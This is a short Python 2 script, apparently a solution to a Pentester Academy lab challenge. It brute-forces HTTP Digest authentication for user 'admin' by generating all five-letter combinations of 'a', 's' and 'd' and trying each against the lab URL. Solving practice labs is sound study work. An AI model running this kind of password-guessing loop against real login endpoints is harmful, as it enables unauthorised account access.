Challenge #5 pentesteracademylab

1. import urllib2
2. import requests
3. from requests.auth import HTTPDigestAuth
4.  
5. theurl="http://pentesteracademylab.appspot.com/lab/webapp/digest/1"
6. all_pass = []
7.  
8. def run_attack():
9.     '''
10.     just to get the Realm and other trick data
11.     http://www.voidspace.org.uk/python/articles/authentication.shtml
12.     '''
13.     req = urllib2.Request(theurl)
14.     try:
15.         handle = urllib2.urlopen(req)
16.     except IOError, e:
17.         if hasattr(e, 'code'):
18.             if e.code != 401:
19.                 print 'We got another error'
20.                 print e.code
21.             else:
22.                 print e.headers
23.                 print e.headers['www-authenticate']
24.  
25. def run_attack2():
26.  
27.     maxlen = len(all_pass)
28.     index = 0
29.     while index < maxlen:
30.         mypass = all_pass.pop()
31.  
32.         saida = requests.get(theurl, auth=HTTPDigestAuth('admin', mypass))
33.         print saida , "->", mypass
34.  
35.         index = index + 1
36.  
37. def gen_password():
38.     '''very dumb pass generator ;) lazy today '''
39.     alp = ["a","s","d"]
40.     for I in range(0,3):
41.         for Z in range (0,3):
42.             for X in range (0,3):
43.                 for Y in range (0,3):
44.                     for W in range (0,3):
45.                         foo = alp[I]+alp[Z]+alp[X]+alp[Y]+alp[W]
46.                         all_pass.append(foo)
47.    
48.     print len(all_pass)
49.  
50.  
51.  
52.  
53. gen_password()
54. run_attack2()